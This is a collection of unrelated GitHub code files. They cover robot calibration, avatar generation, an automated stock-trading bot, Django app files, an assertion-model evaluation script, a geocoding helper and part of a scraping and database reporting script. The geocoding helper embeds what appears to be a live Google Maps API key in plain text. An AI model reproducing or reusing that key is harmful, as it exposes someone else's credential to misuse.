calculate the pose difference between\n the last and second to last observation in world coordinates\n Construct the matrices defining the transformations from camera to marker and from robot base\n to robot endeffector. Use a recursive least squares approach to estimate the transformation\n from endeffector to camera\n \"\"\"\n try:\n tracked_ids = list(self.observations.keys()) # keys of dict to list\n if (tracked_ids == []): # dict is empty, nothing to do here\n return\n id = random.choice(tracked_ids) # pick a random id\n # print(\"random id: {}\".format(id))\n if (len(self.observations[id]) < 2): # a minimum of 2 observations needed for differential measurement\n return\n obs1 = self.observations[id].popleft() # this oldest observation is removed from queue\n obs2 = self.observations[id][0] # this now oldest observation will be kept for next measurement\n timediff = obs2[\"t\"] - obs1[\"t\"]\n # if (np.abs(timediff) > 0.1): # more than three frames means data is too old, 0.03 s bw frames\n # rospy.logwarn(\"Measurement dropped, time bw obs was too much with {} s\".format(timediff))\n # return\n H1 = utils.H_rvec_tvec(obs1[\"rvec\"], obs1[\"tvec\"])\n H2 = utils.H_rvec_tvec(obs2[\"rvec\"], obs2[\"tvec\"])\n H1inv, H2inv = np.linalg.inv(H1), np.linalg.inv(H2)\n\n num_links = self.theta_nom.size\n theta_nom1 = np.array(list(obs1[\"q\"])) + self.theta_nom\n T1 = ParameterEstimator.get_T__i0(num_links, theta_nom1, self.d_nom, self.r_nom, self.alpha_nom)\n\n theta_nom2 = np.array(list(obs2[\"q\"])) + self.theta_nom\n T2 = ParameterEstimator.get_T__i0(num_links, theta_nom2, self.d_nom, self.r_nom, self.alpha_nom)\n\n AA = np.linalg.inv(T1) @ T2\n # BB = H1 @ H2inv\n # BB = H1inv @ H2\n BB = H2 @ H1inv\n # BB = H2inv @ H1\n\n self.ukf.Update(AA, BB)\n self.cntr = self.cntr + 1\n except:\n return\n if self.ukf.consistency[-1] > 0.03:\n print(\"fuggup\")\n if self.cntr>100:\n print(\"ukf.x {}\".format(self.cntr))\n print(self.ukf.x)\n print(\"\\n\")\n import matplotlib.pyplot as plt\n plt.plot(self.ukf.consistency)\n plt.show()\n print(\"test\")\n\n\n\n\n# Node\nif __name__ == \"__main__\":\n rospy.loginfo('Launching Extrinsic Calibrator')\n calibrator = ExtrinsicCalib()\n\n while not rospy.is_shutdown():\n calibrator.process_observations()\n","repo_name":"arminwessel/kident2","sub_path":"src/extrinsic_cal.py","file_name":"extrinsic_cal.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72649057269","text":"#!/usr/bin/env python\n\n\"\"\"\nAn 8-bit avatar generator.\n\"\"\"\n\nfrom __future__ import division\n\nimport argparse\nimport hashlib\nimport numpy\nimport png\n\ndef chunk(s, n):\n \"\"\"\n Chunks a string into fragments n characters long.\n \"\"\"\n for i in range(0, len(s), n):\n yield s[i:i+n]\n\ndef map_coords(s, xmax = 4, ymax = 8):\n \"\"\"\n Transforms two hexadecimal digits (s) to (x, y) coordinates, e.g.,\n \n 10 => (1, 0)\n b3 => (1, 3)\n 2f => (2, 5)\n \n For values greater than xmax or ymax, use the remainder.\n \"\"\"\n s = list(s)\n x = s[0]\n y = s[1]\n if x > xmax:\n x = int(x, 16) % xmax\n if y > ymax:\n y = int(y, 16) % ymax\n return (x,y)\n\ndef get_coords(md5hash):\n chunked = list(chunk(md5hash, 2))\n coords = []\n for c in chunked:\n coords.append(map_coords(c))\n return list(set(coords))\n\ndef choose_foreground(md5hash):\n \"\"\"\n Placeholder function for something more advanced.\n \"\"\"\n return pixelize(md5hash[0:6])\n\ndef choose_background(md5hash):\n \"\"\"\n Placeholder function for something more advanced.\n \"\"\"\n return pixelize(md5hash[6:12])\n\ndef colour_distance(rgb1, rgb2):\n \"\"\"\n Returns the Euclidean distance between two RGB tuples (R, G, B).\n \n Note that this is a first-order estimate; human colour perception is \n non-Euclidean.\n \"\"\"\n dR = (rgb1[0] - rgb2[0])\n dG = (rgb1[1] - rgb2[1])\n dB = (rgb1[2] - rgb2[2])\n d = numpy.sqrt(dR**2 + dG**2 + dB**2)\n return d\n \ndef pixelize(colour):\n \"\"\"\n Takes a colour in #RRGGBB and returns a pixel value as an RGB tuple.\n \"\"\"\n components = list(chunk(colour, 2))\n return tuple([int(x, 16) for x in components])\n\ndef write_png(arr, filename, palette):\n \"\"\"\n Write a binary pixel array to a PNG file.\n \"\"\"\n f = open(filename, 'wb')\n w = png.Writer(palette = palette, bitdepth=1, size=arr.shape)\n w.write(f, arr)\n \ndef fill_pixel_array(coords, size):\n \"\"\"\n Construct an avatar pixel array of arbitrary size.\n \"\"\"\n arr = numpy.zeros((10, 5))\n for c in coords:\n x = c[0]\n y = c[1]\n arr[y+1, x+1] = 1\n arr_mirror = numpy.fliplr(arr)\n arr = numpy.hstack((arr, arr_mirror))\n # Scale the array, e.g. for a scaling factor of n = 2:\n #\n # array([1, 0], => array([1, 1, 0, 0],\n # [1, 1]) [1, 1, 0, 0],\n # [1, 1, 1, 1],\n # [1, 1, 1, 1])\n n = size/arr.shape[0]\n arr = numpy.kron(arr, numpy.ones((n, n)))\n return arr\n\ndef generate_avatar(md5hash, filename, size):\n \"\"\"\n Generate an 8-bit avatar from a given MD5 hash.\n \"\"\"\n fg = choose_foreground(md5hash)\n bg = choose_background(md5hash)\n coords = get_coords(md5hash)\n imgarray = fill_pixel_array(coords, size) \n write_png(imgarray, filename, [bg, fg])\n\ndef main():\n # CLI\n parser = argparse.ArgumentParser(description='Generate a retro avatar.')\n parser.add_argument('email')\n parser.add_argument('--output', default='avatar.png')\n parser.add_argument('--size', default=100, type=int)\n args = parser.parse_args()\n \n email = args.email\n size = args.size\n md5hash = hashlib.md5(email).hexdigest()\n \n generate_avatar(md5hash, args.output, args.size)\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"gistable/gistable","sub_path":"all-gists/3886519/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"} +{"seq_id":"11682693968","text":"#!/usr/bin/env python3\nprint (\"Importing...\")\n\nimport time\nimport Basics\nfrom stockVal import get_current_price, findTrend, fetchData\nfrom config import api\nimport datetime\n\ndef find_time():\n now = datetime.datetime.now()\n current_time = int(now.strftime(\"%H%M\"))\n print(now.strftime(\"%H:%M:%S\"))\n return current_time \n\nprint('\"\" = default option')\nclear_p = input('Clear portfolio? (y/\"n\")') == 'y'\nif input('Wait for market open? (\"y\"/n)') != 'n':\n print(\"Waiting for market open...\")\n while True:\n t = find_time()\n if t >= 625 and t <= 800:\n break\n time.sleep(60)\n while True:\n t = find_time()\n if t == 630:\n print('Start time: {}'.format(t))\n break\n time.sleep(5)\n print(\"Market has opened. Beginning program...\")\n\nc_positions = api.list_positions()\nprint(\"---\")\nprint(\"Scanning Open Positions...\")\np_data = Basics.stockAnal([[p.symbol] for p in c_positions])\nprint(\"---\")\np_num = 5-len(c_positions)\nprint('{} open slots available'.format(p_num))#number of stocks that need replacing (open slots)\norders = api.list_orders()\nb = [p.symbol for p in c_positions]\n\ndef get_order_id(ticker):\n for order in orders:\n if order.symbol == ticker:\n return order.id\ndef close_position(ticker, order_id, shares):\n try:\n api.cancel_order(order_id)\n except:\n print('No open trailing order for {}'.format(ticker))\n time.sleep(5)\n try:\n api.close_position(ticker, qty = abs(shares))\n except:\n print('No open position for {}.'.format(ticker))\n\nprint(\"Filtering open positions\")\nfor stock in tuple(zip(c_positions,p_data)):\n print('-')\n ticker, value, shares = stock[0].symbol, float(stock[0].market_value), int(stock[0].qty)\n try:\n price = get_current_price(ticker)\n except:\n print('Info not received for {}. Closing position...'.format(ticker))\n close_position(ticker, order_id, stock[1][11])\n order_id = get_order_id(ticker)\n trend = findTrend(8, fetchData(ticker), price)\n if value > 0:\n line = stock[1][2]-((stock[1][6]*stock[1][3])*0.001)\n if trend < 0:\n print('{} trend reversed. Closing position...'.format(ticker))\n close_position(ticker, order_id, shares)\n continue\n elif price >= line:\n print('{} near resistance line. Closing position...'.format(ticker))\n close_position(ticker, order_id, shares)\n continue\n elif value < 0:\n line = stock[1][3]+((stock[1][6]*stock[1][2])*0.001)\n if trend > 0:\n print('{} trend reversed. Closing position...'.format(ticker))\n close_position(ticker, order_id, shares)\n continue\n elif price <= line:\n print('{} near support line. Closing position...'.format(ticker))\n close_position(ticker, order_id, shares)\n continue\n print(\"Holding {}\".format(ticker))\n\n\n#Scans if stocks have reached support or resistence or reversed, and sells if they have ^^\nprint(\"---\")\n\nif clear_p:\n p_num = 5\n print(\"---\")\n print(\"Cleaning portfolio...\")\n api.cancel_all_orders()\n api.close_all_positions()\nelse:\n if p_num == 0:\n print(\"No stocks need replacing. Quitting program...\")\n quit()\n\naccount = api.get_account()\nbuying_power = int(float(account.cash)) #set to 1000 during actual trading\nprint(\"Buying power: {}\".format(buying_power))\nconfig = Basics.ConvertJson(Basics.directory + \"json/Var.json\")\ndate = datetime.datetime.date(datetime.datetime.now()).strftime(\"%m%d%y\")\n\nbegin_time = datetime.datetime.now()\nfinviz_stocks = [[x] for x in Basics.FindTopStocks(b)]\nStocks = Basics.stockCalc(finviz_stocks,buying_power,date)[:p_num]\nprint(\"It took this long to scan Stocks: {}\".format(datetime.datetime.now() - begin_time))\nprint(\"---\")\nprint(\"Stock picks:\")\nprint(Stocks)\n\nif config['Date'] == date:\n if input(\"Do you still want to buy today? (y/n)\") == \"n\":\n quit()\n\nprint(\"---\")\nprint(\"Buying Stocks...\")\ndef BuyAllStock():\n for stock in Stocks:\n if stock[-2] > 0:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'buy', type = 'market')\n t = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(\"Bought {} shares of {}. Time: {}; \".format(stock[-2], stock[0], t))\n else:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'sell', type = 'market')\n t = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(\"Sold {} shares of {}. Time: {}; \".format(stock[-2], stock[0], t))\n print(\"Waiting for API\")\n time.sleep(120)\n for stock in Stocks:\n if stock[-2] > 0:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'sell', type = 'trailing_stop', time_in_force = 'gtc', trail_percent = round(stock[6]*(1/2),2)) \n print(\"Trailing order set for {} shares of {}; \".format(stock[-2], stock[0]))\n else:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'buy', type = 'trailing_stop', time_in_force = 'gtc', trail_percent = round(stock[6]*(1/3),2)) \n print(\"Trailing order set for {} shares of {}; \".format(stock[-2], stock[0]))\nBuyAllStock()\n\n","repo_name":"G-Knanochaos/Stock-Trading-Bot","sub_path":"Swing-Trading/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"72531827828","text":"# # How the input() Function Works\n# message = input(\"Tell me something, and I will repeat it back to you: \")\n# print(message)\n\n# # Letting the User Choose When to Quit\n# prompt = \"\\nTell me something, and I will repeat it back to you:\\nEnter 'quit' to end the program.\\n\"\n# message = \"\"\n# while message != 'quit':\n# \tmessage = input(prompt)\n# \tif message != 'quit': print(message)\n\n# Using a Flag\nprompt = \"\\nTell me something, and I will repeat it back to you:\\nEnter 'quit' to end the program.\\n\"\nflag = True\nwhile flag:\n\tmessage = input(prompt)\n\tif message == 'quit':\n\t\tflag = False\n\telse:\n\t\tprint(message)","repo_name":"TrongPhamDA/Python-Crash-Course-2nd-edition","sub_path":"chapter_07/parrot.py","file_name":"parrot.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"4298880816","text":"from django.urls import path\r\nfrom .views import EventCreateForAdmin, EventCreateForUser,LeadCreateViewForAdmin, LeadCreateViewForUser, detail_view, lead_list, events_list, lead_update_admin, lead_update_user, LeadDeleteView\r\n\r\n\r\napp_name = \"leads\"\r\n\r\nurlpatterns = [\r\n path('', lead_list, name='lead_list'),\r\n\r\n\r\n path('create/',LeadCreateViewForUser.as_view() , name='lead_create_user'),\r\n path('createAd/',LeadCreateViewForAdmin.as_view() , name='lead_create_admin'),\r\n path('<pk>/update', lead_update_user,name='lead_update_user'),\r\n path('<pk>/updateAd', lead_update_admin,name='lead_update_admin'),\r\n path('<pk>/delete/', LeadDeleteView.as_view(), name='lead_delete'),\r\n path('<int:pk>/', detail_view,name='lead_detail'),\r\n\r\n\r\n\r\n\r\n\r\n path('events/createUs', EventCreateForUser.as_view(),name='event_create_user'),\r\n path('events/createAd', EventCreateForAdmin.as_view(),name='event_create_admin'),\r\n\r\n\r\n \r\n \r\n path('events_list', events_list, name='events_list'),\r\n\r\n\r\n \r\n\r\n\r\n \r\n]","repo_name":"hosnibelguithh/django_astr2","sub_path":"leads/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38218150547","text":"from django.db import models\nfrom django.utils.timezone import now\n\nfrom base.models import EntityMixin\nfrom gatheros_event.models.mixins import GatherosModelMixin\n\n\nclass SyncItem(GatherosModelMixin, EntityMixin, models.Model):\n class Meta:\n verbose_name = 'item de sincronização'\n verbose_name_plural = 'items de sincronização'\n unique_together = ('object_id', 'object_type',)\n\n CREATION = 'creation'\n EDITION = 'edition'\n DELETION = 'deletion'\n\n ACTION_TYPES = (\n (CREATION, 'Criação'),\n (EDITION, 'Edição'),\n (DELETION, 'Exclusão'),\n )\n\n MODEL_PERSON = 'gatheros_event.person'\n MODEL_SUBSCRIPTION = 'gatheros_subscription.subscription'\n MODEL_TRANSACTION = 'payment.transaction'\n MODEL_TRANSACTION_STATUS = 'payment.transaction_status'\n MODEL_ATTENDANCE_SERVICE = 'attendance.attendance_service'\n MODEL_CHECKIN = 'attendance.checkin'\n MODEL_CHECKOUT = 'attendance.checkout'\n\n MODEL_SURVEY_QUESTION = 'survey.question'\n MODEL_SURVEY_OPTION = 'survey.option'\n MODEL_SURVEY_AUTHOR = 'survey.author'\n MODEL_SURVEY_ANSWER = 'survey.answer'\n\n MODEL_TYPES = (\n (MODEL_PERSON, MODEL_PERSON),\n (MODEL_SUBSCRIPTION, MODEL_SUBSCRIPTION),\n (MODEL_TRANSACTION, MODEL_TRANSACTION),\n (MODEL_TRANSACTION_STATUS, MODEL_TRANSACTION_STATUS),\n (MODEL_ATTENDANCE_SERVICE, MODEL_ATTENDANCE_SERVICE),\n (MODEL_CHECKIN, MODEL_CHECKIN),\n (MODEL_CHECKOUT, MODEL_CHECKOUT),\n )\n\n process_type = models.CharField(\n max_length=10,\n verbose_name='tipo de processamento',\n choices=ACTION_TYPES,\n # required\n blank=True,\n null=True,\n )\n\n process_time = models.DateTimeField(\n verbose_name='data e hora de processamento',\n default=now,\n blank=True,\n null=False,\n editable=False,\n )\n\n object_type = models.TextField(\n verbose_name='Tipo de objeto',\n choices=MODEL_TYPES,\n # required\n blank=True,\n null=True,\n )\n\n object_id = models.TextField(\n verbose_name='ID do objeto',\n # required\n blank=True,\n null=True,\n )\n\n object_repr = models.TextField(\n verbose_name='Repr. do objeto',\n # required\n blank=True,\n null=True,\n )\n\n content = models.TextField(\n verbose_name='Conteúdo a ser sincronizado',\n blank=True,\n null=True,\n )\n\n def __str__(self):\n return '{} (ID: {})'.format(self.object_repr, self.object_id)\n","repo_name":"hugoseabra/congressy","sub_path":"sync_client/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4073582424","text":"\nimport argparse, csv, os, random\nimport pandas as pd\nimport subprocess as sp\nimport numpy as np\n\nimport model.assertion_data as assertion_data\n\npd.options.mode.chained_assignment = None\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\n\ndef main():\n random.seed(0)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('input_data')\n parser.add_argument('metadata')\n parser.add_argument('model_name')\n args = parser.parse_args()\n\n base_dir = os.path.dirname(args.input_data)\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n\n assert base_dir == os.path.dirname(args.metadata)\n\n fm_test_pairs = pd.read_csv(args.input_data).fillna('')\n metadata = pd.read_csv(args.metadata).fillna('')\n metadata['id'] = metadata.project + metadata.bug_num.astype(str) + metadata.test_name\n\n methods, tests, docstrings = fm_test_pairs.focal_method, fm_test_pairs.test_prefix, fm_test_pairs.docstring\n\n print('preparing assertion model inputs')\n vocab = np.load('data/evo_vocab.npy', allow_pickle=True).item()\n assert_input_file = os.path.join(base_dir, 'assert_model_inputs.csv')\n if not os.path.exists(assert_input_file):\n method_test_assert_data, idxs = assertion_data.get_model_inputs(tests, methods, vocab, metadata)\n assert_inputs_df = pd.DataFrame(method_test_assert_data,\n columns=[\"project\", \"bug_num\", \"test_name\", \"test_prefix\", \"source\", \"target\"])\n assert_inputs_df.to_csv(assert_input_file)\n\n sp.run(f'bash ./model/{args.model_name}/run_eval.sh {assert_input_file}'.split(), env=os.environ.copy())\n\n assert_pred_file = os.path.join(base_dir, \"{}_preds\".format(args.model_name), \"assertion_preds.csv\")\n result_df = pd.read_csv(assert_pred_file)\n except_preds = [0] * len(result_df)\n result_df['except_pred'] = except_preds\n\n # write oracle predictions\n pred_file = os.path.join(base_dir, '{}_oracle_preds.csv'.format(args.model_name))\n result_df.to_csv(pred_file)\n\n print(f'wrote oracle predictions to {pred_file}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DIO157128/LLM4Assertion","sub_path":"toga/zenodo_replication_package/toga.py","file_name":"toga.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37998851121","text":"import requests\nimport math\n\ndef fromAddress(address):\n\tmy_api_key = 'AIzaSyC9ZPnhBLoe4SZmkghgQKUJrDKtm2Cu-iE'\n\tapi_address = 'https://maps.googleapis.com/maps/api/geocode/json?address='+\\\n\t\taddress.replace(\" \",\"+\") + \"Western+Cape+South+Africa\" + '&key=' + my_api_key\n\tresponse = requests.get(api_address)\n\tresp_json_payload = response.json()\n\tif resp_json_payload['status'] == 'OK':\n\t\tlat = resp_json_payload['results'][0]['geometry']['location']['lat']\n\t\tlng = resp_json_payload['results'][0]['geometry']['location']['lng']\n\t\treturn Coordinate(lat, lng)\n\telse:\n\t\treturn None\n\nclass Coordinate:\n\tdef __init__(self, latitude=0, longitude=0):\n\t\tself.lat = latitude\n\t\tself.long = longitude\n\n\tdef distance(self, other):\n\t\t#www.movable-type.co.uk/scripts/latlong.html\n\t\tR = 6371*10**3\n\t\tp1 = self.lat*math.pi/180\n\t\tp2 = other.lat*math.pi/180\n\t\td1 = (other.lat-self.lat)*math.pi/180\n\t\td2 = (other.long-self.long)*math.pi/180\n\t\ta =\tmath.sin(d1/2)*math.sin(d1/2)+math.cos(p1)*math.cos(p2)*math.sin(d2)*math.sin(d2)\n\t\tc = 2*math.atan2(math.sqrt(a),math.sqrt(1-a))\n\t\td =\tR*c\n\t\treturn\td\n\n\tdef toString(self):\n\t\treturn \"(\" + str(self.long) + \", \" + str(self.lat) + \")\"\n","repo_name":"stellenbosch-sbitc/alexa-sbitc","sub_path":"router/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28240442977","text":"from django.db import models\nfrom multiselectfield import MultiSelectField\n\nclass Mission(models.Model):\n LEVEL = [\n (1, \"Level1\"),\n (2, \"Level2\"),\n (3, \"Level3\"),\n (4, \"Level4\")\n ]\n TAGS = [\n (\"exercise\", \"운동\"),\n (\"transport\", \"교통\"),\n (\"cleaning\", \"청소\"),\n (\"diet\", \"식생활\"),\n (\"leisure\", \"여가생활\"),\n (\"digital\", \"디지털\"),\n (\"save\", \"절약\")\n ]\n name = models.CharField(max_length=20)\n level = models.IntegerField(choices=LEVEL)\n description = models.CharField(max_length=100)\n tag = MultiSelectField(choices=TAGS, max_length=20, default=\"\")\n\n def __str__(self):\n return self.name","repo_name":"minha62/Ecouni","sub_path":"missions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73625553588","text":"#!/usr/bin/env python3 -u\n# -*- coding: utf-8 -*-\n\nimport csv\nimport getopt\nimport glob\nimport json\nimport logging\nimport logging.handlers\nimport os\nimport re\nimport sys\nimport time\nfrom collections import Counter\n\nimport bs4\nimport nltk\nimport pymysql\nfrom scrapy.cmdline import execute\n\nG_CUR_FILE_PATH = os.path.split(os.path.realpath(__file__))[0]\nos.chdir(G_CUR_FILE_PATH) # 初始化工作路径\n\nimport myutil\n\nDETAIL_FILE = 'detail.csv'\nSUMMARY_FILE = 'summary.csv'\n\n# 查找关键词\nKW_ARR = [\n '集客', '集客支援', 'デジタルマーケティング', 'デジタルマーケティング支援', 'SEO',\n 'SEM', 'Web', 'Webデザイン', 'ウェブ', 'ウェブデザイン', 'EC', 'イーコマース',\n 'eコマース', '運営', 'メディア', '戦略', '企画', 'プランニング', '広告', '代行',\n 'UI', 'UX', 'データ', 'アクセス解析', 'サイト解析', 'ウェブ改善', 'ウェブ解析',\n '分析', '最適化', 'グロースハッカー', 'コンサルティング', 'ソフトウェア', 'IT',\n 'マーケティング', 'ECサイト', '検索エンジン', 'プロモーション', 'リスティング',\n 'ランディングページ', 'コンテンツ', 'アフィリエイト', 'インターネット', '代理店',\n '営業', 'データ', 'コミュニケーション', 'クリエーティブ', 'デジタル', 'PR',\n 'ユーザーエクスペリエンス', '戦略立案', 'CRM', 'アナリティクス', 'クリエイター',\n 'マーケター', 'デザイナー', 'ECサイト', 'インバウンドビジネス', 'インバウンドマーケティング'\n]\n# 对查找的关键词进行预处理:英文全变成小写的\nKW_ARR = [kw.strip().lower() for kw in KW_ARR]\n\n# 一些特殊的关键词 (key_word, pattern)\nSPCE_KW_ARR = [\n (r'A/B test'.strip().lower(), r'\\bA/B\\stest\\b'),\n (r'A/B テスト'.strip().lower(), r'\\bA/B\\sテスト'),\n]\nSPCE_KEY_ARR = [key for key, _ in SPCE_KW_ARR]\n\nALL_KW_ARR = KW_ARR + SPCE_KEY_ARR\n\nEXT_DETAIL_KW_ARR = [\n 'email', 'email_suffix', 'homepage', 'profile_domains', 'company',\n 'user_name', 'phone', 'profile_owner', 'last_month_pv', 'last_month_events',\n 'heatmap_count', 'page_group_count', 'conversion_count', 'login_last_30days',\n 'total_kw_hits', 'distinct_kw_hits'\n]\n\n# 详细表展示关键词\nSHOW_DETAIL_KW_ARR = EXT_DETAIL_KW_ARR + ALL_KW_ARR\n\nEXT_SUMMARY_KW_ARR = [\n 'label', 'email_suffix', 'homepage', 'email_count',\n 'company', 'last_month_pv', 'last_month_events', 'heatmap_count',\n 'page_group_count', 'conversion_count', 'login_last_30days',\n 'total_kw_hits', 'distinct_kw_hits'\n]\n\n# 汇总表展示关键词\nSHOW_SUMMARY_KW_ARR = EXT_SUMMARY_KW_ARR + ALL_KW_ARR\n\n\ndef my_excepthook(exc_type, exc_value, traceback):\n logging.error(\n \"Uncaught Exception\", \n exc_info=(exc_type, exc_value, traceback)\n )\n\n\ndef make_dir(name):\n if not os.path.exists(name):\n os.mkdir(name)\n\n\ndef init_log_config():\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s [%(filename)s %(funcName)s %(lineno)d] %(levelname)s: %(message)s',\n datefmt='[%m/%d %H:%M:%S]'\n )\n\n #################################################################################################\n formatter = logging.Formatter(\n '%(asctime)s [%(filename)s %(funcName)s %(lineno)d] %(levelname)s: %(message)s')\n\n debug_rotating = logging.handlers.RotatingFileHandler(\n \"log/debug.log\", maxBytes=1024*1024*20, backupCount=3, delay=True)\n debug_rotating.set_name('debug')\n debug_rotating.setLevel(logging.DEBUG)\n debug_rotating.setFormatter(formatter)\n logging.getLogger().addHandler(debug_rotating)\n\n info_rotating = logging.handlers.RotatingFileHandler(\n \"log/info.log\", maxBytes=1024*1024*10, backupCount=3, delay=True)\n debug_rotating.set_name('info')\n info_rotating.setLevel(logging.INFO)\n info_rotating.setFormatter(formatter)\n logging.getLogger().addHandler(info_rotating)\n\n error_rotating = logging.handlers.RotatingFileHandler(\n \"log/error.log\", maxBytes=1024*1024*10, backupCount=3, delay=True)\n debug_rotating.set_name('error')\n error_rotating.setLevel(logging.WARNING)\n error_rotating.setFormatter(formatter)\n logging.getLogger().addHandler(error_rotating)\n\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n make_dir(\"log\")\n\n\nclass ArgsException(Exception):\n pass\n\n\nclass MyException(Exception):\n pass\n\n\ndef spider_data():\n try:\n # execute(['scrapy', 'crawl', 'quotes'])\n execute(['scrapy', 'crawl', 'partner']) \n except Exception as e:\n logging.error(e)\n\n\n@myutil.singleton\nclass HandleStore(object):\n\n def __init__(self):\n self.detail_fields = SHOW_DETAIL_KW_ARR\n self.summary_fields = SHOW_SUMMARY_KW_ARR\n make_dir('record')\n\n def handle_file_name(self, file_name):\n record_file = os.path.join('.', 'record', file_name)\n if os.path.exists(record_file):\n file_suffix = str(time.time())\n os.rename(record_file, record_file+r'.'+file_suffix)\n\n if os.path.exists(record_file):\n raise MyException('%s rename error' % file_name)\n\n return record_file\n\n def write_detail_head(self, file_name, mode='w'):\n with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n writer = csv.DictWriter(\n f,\n dialect=myutil.MyDialect,\n fieldnames=self.detail_fields\n )\n writer.writeheader()\n\n def write_summary_head(self, file_name, mode='w'):\n with open(file_name, 'w', newline='', encoding='utf-8-sig') as f:\n writer = csv.DictWriter(\n f,\n dialect=myutil.MyDialect,\n fieldnames=self.summary_fields\n )\n writer.writeheader()\n\n def write_detail_row(self, file_name, row, mode='a'):\n with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n writer = csv.DictWriter(\n f,\n dialect=myutil.MyDialect,\n fieldnames=self.detail_fields\n )\n writer.writerow(row)\n\n def write_summary_row(self, file_name, row, mode='a'):\n with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n writer = csv.DictWriter(\n f,\n dialect=myutil.MyDialect,\n fieldnames=self.summary_fields\n )\n writer.writerow(row)\n\n\n@myutil.singleton\nclass LoadSQLData(object):\n def __init__(self):\n self.clear()\n self.load_data()\n\n def clear(self):\n self.ref_site_status = {}\n self.user_login_log = {}\n self.usrelationship = {}\n self.user_detail = []\n self.dd = {}\n self.email2uid = {}\n\n def load_data(self):\n # 加载user detail表信息\n with open(myutil.SAVE_FILE, 'r', encoding='utf-8-sig') as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.email2uid[row['email']] = int(row['uid'])\n self.user_detail.append(row)\n\n # 加载dd已经算好的csv数据\n dd_file = os.path.join('record', 'dd.csv')\n with open(dd_file, 'r', encoding='utf-8-sig') as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.dd[row['email']] = row\n\n # 以下数据从产品数据库中加载\n db_info = myutil.get_db_info()\n conn = pymysql.connect(\n host=db_info['host'],\n port=db_info['port'],\n user=db_info['user'],\n password=db_info['passwd'],\n # db=MYSQL_DB\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor\n )\n\n # 用户对应的所有档案\n with conn.cursor() as cursor:\n sql = '''\n select uid, siteid, type from ptmind_common.ptengine_usrelationship\n where uid is not null;\n '''\n cursor.execute(sql)\n for row in cursor:\n uid = row['uid']\n siteid = row['siteid']\n ptype = row['type']\n if uid in self.usrelationship.keys():\n self.usrelationship[uid].append((siteid, ptype))\n else:\n self.usrelationship[uid] = [(siteid, ptype)]\n\n # 档案状态表\n with conn.cursor() as cursor:\n sql = '''\n SELECT seqid, primary_domain FROM ptmind_common.ref_site_status\n where user_id is not null;\n '''\n cursor.execute(sql)\n for row in cursor:\n seqid = row['seqid']\n primary_domain = row['primary_domain'].strip()\n if seqid not in self.ref_site_status.keys():\n self.ref_site_status[seqid] = primary_domain.split(r',')\n\n # 用户的登陆信息表\n # with conn.cursor() as cursor:\n # db_name = 'ptmind_user_service'\n # if myutil.get_run_type() == 'release':\n # db_name = 'ptmind-user-service'\n\n # time_before_30 = int((time.time() - 86500*30) * 1000)\n\n # sql = '''\n # select uid, login_time from %s.user_login_log\n # where uid is not null and login_time > %s;\n # ''' % (db_name, time_before_30)\n # cursor.execute(sql)\n # for row in cursor:\n # user_id = row['uid']\n # login_time = row['login_time']\n # if user_id in self.user_login_log.keys():\n # self.user_login_log[user_id].append(login_time)\n # else:\n # self.user_login_log[user_id] = [login_time]\n\n conn.close()\n\n def get_user_detail(self):\n return self.user_detail\n\n def is_profile_owner(self, uid):\n if uid in self.usrelationship.keys():\n for _siteid, ptype in self.usrelationship[uid]:\n if ptype == 0:\n return 'Y'\n\n return 'N'\n\n def get_profile_domains(self, email, ftype='detail'):\n uid = self.__get_uid_by_email(email)\n if uid is None:\n return None\n\n all_profilee_domains = []\n\n if uid not in self.usrelationship.keys():\n return None\n\n for site_id, ptype in self.usrelationship[uid]:\n if ftype == 'detail' and ptype != 0:\n continue\n\n if site_id in self.ref_site_status.keys():\n all_profilee_domains += self.ref_site_status[site_id]\n\n return ','.join(all_profilee_domains)\n\n def __get_uid_by_email(self, email):\n if email in self.email2uid.keys():\n return self.email2uid[email]\n return None\n\n def get_dd_info(self, email):\n if email in self.dd.keys():\n info = self.dd[email]\n return {\n 'last_month_pv': info['pv_cnt_m_prev'],\n 'last_month_events': 